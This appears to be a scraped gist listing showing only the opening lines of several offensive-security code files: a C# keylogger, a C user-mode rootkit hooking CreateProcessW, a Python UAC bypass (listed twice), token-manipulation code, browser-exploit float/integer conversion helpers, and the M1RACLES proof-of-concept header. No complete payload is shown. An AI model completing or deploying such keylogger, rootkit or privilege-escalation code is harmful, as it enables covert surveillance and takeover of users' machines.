This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// _oo0oo_ | |
// o8888888o | |
// 88" . "88 | |
// (| -_- |) | |
// 0\ = /0 | |
// ___/`---'\___ | |
// .' \\| |// '. | |
// / \\||| : |||// \ | |
// / _||||| -:- |||||- \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
!function () { | |
var global = this; | |
var old_eval = global.eval; | |
var old_const = global.Function.prototype.constructor; | |
global.Function.prototype.constructor = function (code) { | |
console.log('Function Constructor: ' + code); | |
return old_const(code); | |
}; | |
global.eval = function (code) { | |
console.log('EVIL: ' + code); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Windows.Forms; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
//KeyStroke Mouse Clicks Code | |
/* | |
* https://code.google.com/p/klog-sharp/ | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
FARPROC fpCreateProcessW; | |
BYTE bSavedByte; | |
// Blog Post Here: | |
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
// tasklist | findstr explore.exe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
# This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
shell32 = WinDLL('shell32' , use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
# This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
from ctypes.wintypes import * | |
from ctypes import * | |
from enum import IntEnum | |
kernel32 = WinDLL('kernel32', use_last_error=True) | |
advapi32 = WinDLL('advapi32', use_last_error=True) | |
shell32 = WinDLL('shell32' , use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DWORD Error, bytesIO; | |
NTSTATUS Status; | |
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
BOOL bCond = FALSE; | |
SHELLEXECUTEINFO shinfo; | |
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
TOKEN_MANDATORY_LABEL tml, *ptml; | |
PSID pIntegritySid = NULL; | |
STARTUPINFO si; | |
PROCESS_INFORMATION pi; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.IO.Compression; | |
using System.Text; | |
using System.Collections.Generic; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class Helpers { | |
constructor() { | |
this.cvt_buf = new ArrayBuffer(8); | |
this.cvt_f64a = new Float64Array(this.cvt_buf); | |
this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
} | |
ftoi(f) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
* | |
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
* | |
* Please visit m1racles.com for more information. | |
* | |
* Licensed under the MIT license. | |
*/ |
OlderNewer